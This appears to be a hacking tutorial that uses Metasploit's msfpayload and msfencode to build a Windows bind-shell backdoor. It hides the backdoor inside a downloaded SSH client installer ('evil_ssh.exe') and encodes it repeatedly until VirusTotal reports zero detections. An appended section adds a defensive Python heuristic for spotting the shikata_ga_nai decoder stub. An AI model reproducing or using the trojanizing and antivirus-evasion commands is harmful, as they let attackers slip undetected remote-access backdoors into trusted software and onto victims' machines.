A Backtrack machine, real or virtual. I used Backtrack 5 r3, but other versions of Backtrack work OK too.
We are using some harmless test files, but don't infect people with any real viruses. That's a crime, and we here at HackyShacky are not responsible for it.
Antivirus protects machines from malware, but not from all of it. There are ways to pack malware to make it harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.
Creating a Listener:
This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won't spread, but it is detected by antivirus engines. In Backtrack, in a Terminal window, execute these commands:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file in the listing.
Analyzing the Listener with VirusTotal
Go to https://www.virustotal.com/en/
Encoding the Listener
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil_ssh.exe file in the listing.
Scan with VirusTotal
Go to: https://www.virustotal.com/
If you see a “File already analyzed” message, click the “View last analysis” button.
Encode the Listener Again
This process will encode the listener with several different encodings.
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
The analysis shows that fewer of the antivirus engines detect the file now: 0 out of 42 when I did it. You may see different numbers.
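
From the defender's side, a falling engine count does not mean the file has no scannable features: the decoder stub that x86/shikata_ga_nai prepends is one. The following is an added example, not part of the original tutorial, showing a heuristic Python check for that encoder's FPU-based GetPC sequence (fnstenv [esp-0xc] followed shortly by pop r32). The byte pattern, the 16-byte window and the sample buffers are assumptions constructed for illustration, and other code using the same idiom will also match.

```python
"""Heuristic scan for the FPU-based GetPC stub used by x86/shikata_ga_nai.

Added example, not from the original tutorial. The pattern and window size
are assumptions based on the encoder's publicly documented decoder stub.
"""
import sys

# fnstenv [esp-0xc]: stores the FPU environment, which includes the address
# of the last FPU instruction, so a following pop yields the current EIP.
FNSTENV = b"\xd9\x74\x24\xf4"
POP_R32 = set(range(0x58, 0x60)) - {0x5C}  # pop eax..edi, excluding pop esp
WINDOW = 16  # assumed maximum gap between fnstenv and the pop


def find_getpc_stubs(data: bytes, window: int = WINDOW) -> list[int]:
    """Return offsets of fnstenv [esp-0xc] followed by a pop r32 in window."""
    hits = []
    pos = data.find(FNSTENV)
    while pos != -1:
        start = pos + len(FNSTENV)
        tail = data[start:start + window]
        if any(b in POP_R32 for b in tail):
            hits.append(pos)
        pos = data.find(FNSTENV, pos + 1)
    return hits


def scan_file(path: str) -> list[int]:
    """Scan a file on disk, e.g. an executable pulled from quarantine."""
    with open(path, "rb") as fh:
        return find_getpc_stubs(fh.read())


# Constructed sample buffers (marker bytes plus padding, not real payloads).
SAMPLE_SUSPICIOUS = b"\x90" * 32 + b"\xda\xc1" + FNSTENV + b"\x5b" + b"\x00" * 32
SAMPLE_NO_POP = b"\x90" * 32 + FNSTENV + b"\x00" * 32
SAMPLE_CLEAN = b"MZ" + b"\x00" * 64

if __name__ == "__main__":
    for path in sys.argv[1:]:
        offsets = scan_file(path)
        verdict = "SUSPICIOUS" if offsets else "no stub found"
        print(f"{path}: {verdict} {[hex(o) for o in offsets]}")
```

A hit is a triage signal for closer analysis, not a verdict; pair it with behavioural checks such as an unexpected listening port on the host.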